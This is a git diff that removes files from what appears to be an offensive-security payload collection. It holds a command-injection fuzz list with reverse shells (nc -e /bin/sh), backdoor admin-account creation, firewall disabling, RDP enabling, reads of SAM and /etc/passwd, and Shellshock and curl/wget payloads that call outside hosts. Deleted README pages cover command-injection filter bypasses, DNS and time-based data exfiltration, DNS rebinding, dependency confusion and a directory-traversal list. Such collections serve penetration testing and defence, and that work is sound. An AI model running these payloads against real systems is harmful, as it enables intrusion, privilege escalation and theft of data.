XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') -eval('ls') -eval('pwd') -eval('pwd'); -eval('sleep 5') -eval('sleep 5'); -eval('whoami') -eval('whoami'); -exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') -exec('ls') -exec('pwd') -exec('pwd'); -exec('sleep 5') -exec('sleep 5'); -exec('whoami') -exec('whoami'); -;{$_GET["cmd"]} -`id` -|id -| id -;id -;id| -;id; -& id -&&id -;id\n -ifconfig -| ifconfig -; ifconfig -& ifconfig -&& ifconfig -/index.html|id| -ipconfig -| ipconfig /all -; ipconfig /all -& ipconfig /all -&& ipconfig /all -ipconfig /all -ls -$(`ls`) -| ls -l / -; ls -l / -& ls -l / -&& ls -l / -ls -l / -| ls -laR /etc -; ls -laR /etc -& ls -laR /etc -&& ls -laR /etc -| ls -laR /var/www -; ls -laR /var/www -& ls -laR /var/www -&& ls -laR /var/www -| ls -l /etc/ -; ls -l /etc/ -& ls -l /etc/ -&& ls -l /etc/ -ls -l /etc/ -ls -lh /etc/ -| ls -l /home/* -; ls -l /home/* -& ls -l /home/* -&& ls -l /home/* -ls -l /home/* -*; ls -lhtR /var/www/ -| ls -l /tmp -; ls -l /tmp -& ls -l /tmp -&& ls -l /tmp -ls -l /tmp -| ls -l /var/www/* -; ls -l /var/www/* -& ls -l /var/www/* -&& ls -l /var/www/* -ls -l /var/www/* - - - -\n -\n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\` -\n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\` -\n/bin/ls -al\n -| nc -lvvp 4444 -e /bin/sh| -; nc -lvvp 4444 -e /bin/sh; -& nc -lvvp 4444 -e /bin/sh& -&& nc -lvvp 4444 -e /bin/sh & -nc -lvvp 4444 -e /bin/sh -nc -lvvp 4445 -e /bin/sh & -nc -lvvp 4446 -e /bin/sh| -nc -lvvp 4447 -e /bin/sh; -nc -lvvp 4448 -e /bin/sh& -\necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n -\necho INJECTX\nexit\n\033[2Asleep 5\n -\necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n -| net localgroup Administrators hacker /ADD -; net localgroup Administrators hacker /ADD -& net localgroup Administrators hacker /ADD -&& net localgroup Administrators hacker /ADD -net localgroup Administrators hacker /ADD -| netsh firewall set opmode disable -; netsh firewall set opmode disable -& netsh firewall set opmode disable -&& netsh firewall set opmode disable -netsh firewall set opmode disable -netstat -;netstat -a; -| netstat -an -; netstat -an -& netstat -an -&& netstat -an -netstat -an -| net user hacker Password1 /ADD -; net user hacker Password1 /ADD -& net user hacker Password1 /ADD -&& net user hacker Password1 /ADD -net user hacker Password1 /ADD -| net view -; net view -& net view -&& net view -net view -\nid| -\nid; -\nid\n -\n/usr/bin/id\n -perl -e 'print "X"x1024' -|| perl -e 'print "X"x16096' -| perl -e 'print "X"x16096' -; perl -e 'print "X"x16096' -& perl -e 'print "X"x16096' -&& perl -e 'print "X"x16096' -perl -e 'print "X"x16384' -; perl -e 'print "X"x2048' -& perl -e 'print "X"x2048' -&& perl -e 'print "X"x2048' -perl -e 'print "X"x2048' -|| perl -e 'print "X"x4096' -| perl -e 'print "X"x4096' -; perl -e 'print "X"x4096' -& perl -e 'print "X"x4096' -&& perl -e 'print "X"x4096' -perl -e 'print "X"x4096' -|| perl -e 'print "X"x8096' -| perl -e 'print "X"x8096' -; perl -e 'print "X"x8096' -&& perl -e 'print "X"x8096' -perl -e 'print "X"x8192' -perl -e 'print "X"x81920' -|| phpinfo() -| phpinfo() - {${phpinfo()}} -;phpinfo() -;phpinfo();// -';phpinfo();// -{${phpinfo()}} -& phpinfo() -&& phpinfo() -phpinfo() -phpinfo(); - - - - - - - - -:phpversion(); -`ping 127.0.0.1` -& ping -i 30 127.0.0.1 & -& ping -n 30 127.0.0.1 & -;${@print(md5(RCEVulnerable))}; -${@print("RCEVulnerable")} -${@print(system($_SERVER['HTTP_USER_AGENT']))} -pwd -| pwd -; pwd -& pwd -&& pwd -\r -| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f -; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f -& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f -&& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f -reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f -\r\n -route -| sleep 1 -; sleep 1 -& sleep 1 -&& sleep 1 -sleep 1 -|| sleep 10 -| sleep 10 -; sleep 10 -{${sleep(10)}} -& sleep 10 -&& sleep 10 -sleep 10 -|| sleep 15 -| sleep 15 -; sleep 15 -& sleep 15 -&& sleep 15 - {${sleep(20)}} -{${sleep(20)}} - {${sleep(3)}} -{${sleep(3)}} -| sleep 5 -; sleep 5 -& sleep 5 -&& sleep 5 -sleep 5 - {${sleep(hexdec(dechex(20)))}} -{${sleep(hexdec(dechex(20)))}} -sysinfo -| sysinfo -; sysinfo -& sysinfo -&& sysinfo -;system('cat%20/etc/passwd') -system('cat C:\boot.ini'); -system('cat config.php'); -system('cat /etc/passwd'); -|| system('curl https://crowdshield.com/.testing/rce_vuln.txt'); -| system('curl https://crowdshield.com/.testing/rce_vuln.txt'); -; system('curl https://crowdshield.com/.testing/rce_vuln.txt'); -& system('curl https://crowdshield.com/.testing/rce_vuln.txt'); -&& system('curl https://crowdshield.com/.testing/rce_vuln.txt'); -system('curl https://crowdshield.com/.testing/rce_vuln.txt') -system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf') -system('curl https://xerosecurity.com/.testing/rce_vuln.txt'); -system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') -systeminfo -| systeminfo -; systeminfo -& systeminfo -&& systeminfo -system('ls') -system('pwd') -system('pwd'); -|| system('sleep 5'); -| system('sleep 5'); -; system('sleep 5'); -& system('sleep 5'); -&& system('sleep 5'); -system('sleep 5') -system('sleep 5'); -system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23') -system('wget https://xerosecurity.com/.testing/rce_vuln.txt'); -system('whoami') -system('whoami'); -test*; ls -lhtR /var/www/ -test* || perl -e 'print "X"x16096' -test* | perl -e 'print "X"x16096' -test* & perl -e 'print "X"x16096' -test* && perl -e 'print "X"x16096' -test*; perl -e 'print "X"x16096' -$(`type C:\boot.ini`) -&&type C:\\boot.ini -| type C:\Windows\repair\SAM -; type C:\Windows\repair\SAM -& type C:\Windows\repair\SAM -&& type C:\Windows\repair\SAM -type C:\Windows\repair\SAM -| type C:\Windows\repair\SYSTEM -; type C:\Windows\repair\SYSTEM -& type C:\Windows\repair\SYSTEM -&& type C:\Windows\repair\SYSTEM -type C:\Windows\repair\SYSTEM -| type C:\WINNT\repair\SAM -; type C:\WINNT\repair\SAM -& type C:\WINNT\repair\SAM -&& type C:\WINNT\repair\SAM -type C:\WINNT\repair\SAM -type C:\WINNT\repair\SYSTEM -| type %SYSTEMROOT%\repair\SAM -; type %SYSTEMROOT%\repair\SAM -& type %SYSTEMROOT%\repair\SAM -&& type %SYSTEMROOT%\repair\SAM -type %SYSTEMROOT%\repair\SAM -| type %SYSTEMROOT%\repair\SYSTEM -; type %SYSTEMROOT%\repair\SYSTEM -& type %SYSTEMROOT%\repair\SYSTEM -&& type %SYSTEMROOT%\repair\SYSTEM -type %SYSTEMROOT%\repair\SYSTEM -uname -;uname; -| uname -a -; uname -a -& uname -a -&& uname -a -uname -a -|/usr/bin/id -;|/usr/bin/id| -;/usr/bin/id| -$;/usr/bin/id -() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");' -() { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11 -| wget http://crowdshield.com/.testing/rce.txt -& wget http://crowdshield.com/.testing/rce.txt -; wget https://crowdshield.com/.testing/rce_vuln.txt -$(`wget https://crowdshield.com/.testing/rce_vuln.txt`) -&& wget https://crowdshield.com/.testing/rce_vuln.txt -wget https://crowdshield.com/.testing/rce_vuln.txt -$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`) -which curl -which gcc -which nc -which netcat -which perl -which python -which wget -whoami -| whoami -; whoami -' whoami -' || whoami -' & whoami -' && whoami -'; whoami -" whoami -" || whoami -" | whoami -" & whoami -" && whoami -"; whoami -$(`whoami`) -& whoami -&& whoami -{{ get_user_file("C:\boot.ini") }} -{{ get_user_file("/etc/hosts") }} -{{ get_user_file("/etc/passwd") }} -{{4+4}} -{{4+8}} -{{person.secret}} -{{person.name}} -{1} + {1} -{% For c in [1,2,3]%} {{c, c, c}} {% endfor%} -{{[] .__ Class __.__ base __.__ subclasses __ ()}} diff --git a/Command Injection/README.md b/Command Injection/README.md deleted file mode 100644 index 9a6d66d..0000000 --- a/Command Injection/README.md +++ /dev/null @@ -1,352 +0,0 @@ -# Command Injection - -> Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application. - -## Summary - -* [Tools](#tools) -* [Exploits](#exploits) - * [Basic commands](#basic-commands) - * [Chaining commands](#chaining-commands) - * [Inside a command](#inside-a-command) -* [Filter Bypasses](#filter-bypasses) - * [Bypass without space](#bypass-without-space) - * [Bypass with a line return](#bypass-with-a-line-return) - * [Bypass with backslash newline](#bypass-with-backslash-newline) - * [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding) - * [Bypass blacklisted words](#bypass-blacklisted-words) - * [Bypass with single quote](#bypass-with-single-quote) - * [Bypass with double quote](#bypass-with-double-quote) - * [Bypass with backslash and slash](#bypass-with-backslash-and-slash) - * [Bypass with $@](#bypass-with-) - * [Bypass with $()](#bypass-with--1) - * [Bypass with variable expansion](#bypass-with-variable-expansion) - * [Bypass with wildcards](#bypass-with-wildcards) -* [Challenge](#challenge) -* [Time based data exfiltration](#time-based-data-exfiltration) -* [DNS based data exfiltration](#dns-based-data-exfiltration) -* [Polyglot command injection](#polyglot-command-injection) -* [Backgrounding long running commands](#backgrounding-long-running-commands) -* [References](#references) - - -## Tools - -* [commix - Automated All-in-One OS command injection and exploitation tool](https://github.com/commixproject/commix) - -## Exploits - -### Basic commands - -Execute the command and voila :p - -```powershell -cat /etc/passwd -root:x:0:0:root:/root:/bin/bash -daemon:x:1:1:daemon:/usr/sbin:/bin/sh -bin:x:2:2:bin:/bin:/bin/sh -sys:x:3:3:sys:/dev:/bin/sh -``` - -### Chaining commands - -```powershell -original_cmd_by_server; ls -original_cmd_by_server && ls -original_cmd_by_server | ls -original_cmd_by_server || ls # Only if the first cmd fail -``` - -Commands can also be run in sequence with newlines - -```bash -original_cmd_by_server -ls -``` - -### Inside a command - -```bash -original_cmd_by_server `cat /etc/passwd` -original_cmd_by_server $(cat /etc/passwd) -``` - -## Filter Bypasses - -### Bypass without space - -Works on Linux only. - -```powershell -swissky@crashlab:~/Www$ cat/tmp/hi< /usr/bin/zsh -echo whoami|$0 -``` - -### Bypass with $() -```powershell -who$()ami -who$(echo am)i -who`echo am`i -``` - -#### Bypass with variable expansion - -```powershell -/???/??t /???/p??s?? - -test=/ehhh/hmtc/pahhh/hmsswd -cat ${test//hhh\/hm/} -cat ${test//hh??hm/} -``` - -#### Bypass with wildcards - -```powershell -powershell C:\*\*2\n??e*d.*? # notepad -@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc -``` - -## Challenge - -Challenge based on the previous tricks, what does the following command do: - -```powershell -g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/} -``` - -## Time based data exfiltration - -Extracting data : char by char - -```powershell -swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi -real 0m5.007s -user 0m0.000s -sys 0m0.000s - -swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi -real 0m0.002s -user 0m0.000s -sys 0m0.000s -``` - -## DNS based data exfiltration - -Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbin.zhack.ca - -```powershell -1. Go to http://dnsbin.zhack.ca/ -2. Execute a simple 'ls' -for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done -``` - -```powershell -$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il) -``` - -Online tools to check for DNS based data exfiltration: - -- dnsbin.zhack.ca -- pingb.in - -## Polyglot command injection - -```bash -1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} - -e.g: -echo 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} -echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} -echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} -``` - -```bash -/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/ - -e.g: -echo 1/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/ -echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/" -echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/' -``` - -## Backgrounding long running commands - -In some instances, you might have a long running command that gets killed by the process injecting it timing out. - -Using nohup, you can keep the process running after the parent process exits. - -```bash -nohup sleep 120 > /dev/null & -``` - -## Labs - -* [OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple) -* [Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays) -* [Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection) -* [Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band) -* [Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration) - -## References - -* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/) -* [Bug Bounty Survey - Windows RCE spaceless](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136) -* [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628) -* [#bash #obfuscation by string manipulation - Malwrologist, @DissectMalware](https://twitter.com/DissectMalware/status/1025604382644232192) -* [What is OS command injection - portswigger](https://portswigger.net/web-security/os-command-injection) diff --git a/DNS Rebinding/README.md b/DNS Rebinding/README.md deleted file mode 100644 index c35ddaa..0000000 --- a/DNS Rebinding/README.md +++ /dev/null @@ -1,75 +0,0 @@ -# DNS Rebinding - -> DNS rebinding changes the IP address of an attacker controlled machine name to the IP address of a target application, bypassing the [same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy) and thus allowing the browser to make arbitrary requests to the target application and read their responses. - -## Summary - -* [Tools](#tools) -* [Exploitation](#exploitation) -* [Protection Bypasses](#protection-bypasses) - -## Tools - -- [Singularity of Origin](https://github.com/nccgroup/singularity) - is a tool to perform DNS rebinding attacks. -- [Singularity of Origin Web Client](http://rebind.it/) (manager interface, port scanner and autoattack) - -## Exploitation - -First, we need to make sure that the targeted service is vulnerable to DNS rebinding. -It can be done with a simple curl request: - -```bash -curl --header 'Host: ' http://:8080 -``` - -If the server returns the expected result (e.g. the regular web page) then the service is vulnerable. -If the server returns an error message (e.g. 404 or similar), the server has most likely protections implemented which prevent DNS rebinding attacks. - -Then, if the service is vulnerable, we can abuse DNS rebinding by following these steps: - -1. Register a domain. -2. [Setup Singularity of Origin](https://github.com/nccgroup/singularity/wiki/Setup-and-Installation). -3. Edit the [autoattack HTML page](https://github.com/nccgroup/singularity/blob/master/html/autoattack.html) for your needs. -4. Browse to "http://rebinder.your.domain:8080/autoattack.html". -5. Wait for the attack to finish (it can take few seconds/minutes). - -## Protection Bypasses - -> Most DNS protections are implemented in the form of blocking DNS responses containing unwanted IP addresses at the perimeter, when DNS responses enter the internal network. The most common form of protection is to block private IP addresses as defined in RFC 1918 (i.e. 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16). Some tools allow to additionally block localhost (127.0.0.0/8), local (internal) networks, or 0.0.0.0/0 network ranges. - -In the case where DNS protection are enabled (generally disabled by default), NCC Group has documented multiple [DNS protection bypasses](https://github.com/nccgroup/singularity/wiki/Protection-Bypasses) that can be used. - -### 0.0.0.0 - -We can use the IP address 0.0.0.0 to access the localhost (127.0.0.1) to bypass filters blocking DNS responses containing 127.0.0.1 or 127.0.0.0/8. - -### CNAME - -We can use DNS CNAME records to bypass a DNS protection solution that blocks all internal IP addresses. -Since our response will only return a CNAME of an internal server, -the rule filtering internal IP addresses will not be applied. -Then, the local, internal DNS server will resolve the CNAME. - -```bash -$ dig cname.example.com +noall +answer -; <<>> DiG 9.11.3-1ubuntu1.15-Ubuntu <<>> example.com +noall +answer -;; global options: +cmd -cname.example.com. 381 IN CNAME target.local. -``` - -### localhost - -We can use "localhost" as a DNS CNAME record to bypass filters blocking DNS responses containing 127.0.0.1. - -```bash -$ dig www.example.com +noall +answer -; <<>> DiG 9.11.3-1ubuntu1.15-Ubuntu <<>> example.com +noall +answer -;; global options: +cmd -localhost.example.com. 381 IN CNAME localhost. -``` - -## References - -- [How Do DNS Rebinding Attacks Work? - nccgroup, 2019](https://github.com/nccgroup/singularity/wiki/How-Do-DNS-Rebinding-Attacks-Work%3F) - - diff --git a/Dependency Confusion/README.md b/Dependency Confusion/README.md deleted file mode 100644 index 5e4831d..0000000 --- a/Dependency Confusion/README.md +++ /dev/null @@ -1,32 +0,0 @@ -# Dependency Confusion - -> A dependency confusion attack or supply chain substitution attack occurs when a software installer script is tricked into pulling a malicious code file from a public repository instead of the intended file of the same name from an internal repository. - -## Summary - -* [Tools](#tools) -* [Exploit](#exploitation) -* [References](#references) - - -## Tools - -* [Confused](https://github.com/visma-prodsec/confused) - -## Exploit - -Look for `npm`, `pip`, `gem` packages, the methodology is the same : you register a public package with the same name of private one used by the company and then you wait for it to be used. - -### NPM example - -* List all the packages (ie: package.json, composer.json, ...) -* Find the package missing from https://www.npmjs.com/ -* Register and create a **public** package with the same name - * Package example : https://github.com/0xsapra/dependency-confusion-expoit - -## References - -* [Exploiting Dependency Confusion - 2 Jul 2021 - 0xsapra](https://0xsapra.github.io/website//Exploiting-Dependency-Confusion) -* [Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies - Alex Birsan - 9 Feb 2021](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610) -* [Ways to Mitigate Risk When Using Private Package Feeds - Microsoft - 29/03/2021](https://azure.microsoft.com/en-gb/resources/3-ways-to-mitigate-risk-using-private-package-feeds/) -* [$130,000+ Learn New Hacking Technique in 2021 - Dependency Confusion - Bug Bounty Reports Explained](https://www.youtube.com/watch?v=zFHJwehpBrU ) \ No newline at end of file diff --git a/Directory Traversal/Intruder/deep_traversal.txt b/Directory Traversal/Intruder/deep_traversal.txt deleted file mode 100644 index 5555216..0000000 --- a/Directory Traversal/Intruder/deep_traversal.txt +++ /dev/null @@ -1,879 +0,0 @@ -../{FILE} -../../{FILE} -../../../{FILE} -../../../../{FILE} -../../../../../{FILE} -../../../../../../{FILE} -../../../../../../../{FILE} -../../../../../../../../{FILE} -..%2f{FILE} -..%2f..%2f{FILE} -..%2f..%2f..%2f{FILE} -..%2f..%2f..%2f..%2f{FILE} -..%2f..%2f..%2f..%2f..%2f{FILE} -..%2f..%2f..%2f..%2f..%2f..%2f{FILE} -..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE} -..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE} -%2e%2e/{FILE} -%2e%2e/%2e%2e/{FILE} -%2e%2e/%2e%2e/%2e%2e/{FILE} -%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} 